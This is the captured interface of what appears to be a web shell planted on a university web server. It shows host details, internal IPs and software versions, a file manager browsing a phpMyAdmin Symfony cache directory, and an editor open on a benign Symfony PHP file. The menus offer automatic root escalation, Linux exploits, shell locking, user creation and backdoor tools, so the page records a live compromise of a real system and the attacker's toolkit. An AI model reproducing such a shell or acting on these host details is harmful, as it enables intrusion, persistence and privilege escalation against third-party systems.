Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
vendor /
symfony /
cache /
[ HOME SHELL ]
Name
Size
Permission
Action
Adapter
[ DIR ]
drwxrwxr-x
DataCollector
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Simple
[ DIR ]
drwxrwxr-x
Traits
[ DIR ]
drwxrwxr-x
CacheItem.php
5.04
KB
-rwxrwxr-x
CHANGELOG.md
988
B
-rwxrwxr-x
composer.json
1.25
KB
-rwxrwxr-x
DoctrineProvider.php
1.53
KB
-rwxrwxr-x
LICENSE
1.04
KB
-rwxrwxr-x
phpunit.xml.dist
1.63
KB
-rwxrwxr-x
README.md
922
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DoctrineProvider.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Cache; use Doctrine\Common\Cache\CacheProvider; use Psr\Cache\CacheItemPoolInterface; /** * @author Nicolas Grekas <p@tchwork.com> */ class DoctrineProvider extends CacheProvider { private $pool; public function __construct(CacheItemPoolInterface $pool) { $this->pool = $pool; } /** * {@inheritdoc} */ protected function doFetch($id) { $item = $this->pool->getItem(rawurlencode($id)); return $item->isHit() ? $item->get() : false; } /** * {@inheritdoc} */ protected function doContains($id) { return $this->pool->hasItem(rawurlencode($id)); } /** * {@inheritdoc} */ protected function doSave($id, $data, $lifeTime = 0) { $item = $this->pool->getItem(rawurlencode($id)); if (0 < $lifeTime) { $item->expiresAfter($lifeTime); } return $this->pool->save($item->set($data)); } /** * {@inheritdoc} */ protected function doDelete($id) { return $this->pool->deleteItem(rawurlencode($id)); } /** * {@inheritdoc} */ protected function doFlush() { $this->pool->clear(); } /** * {@inheritdoc} */ protected function doGetStats() { } }
Close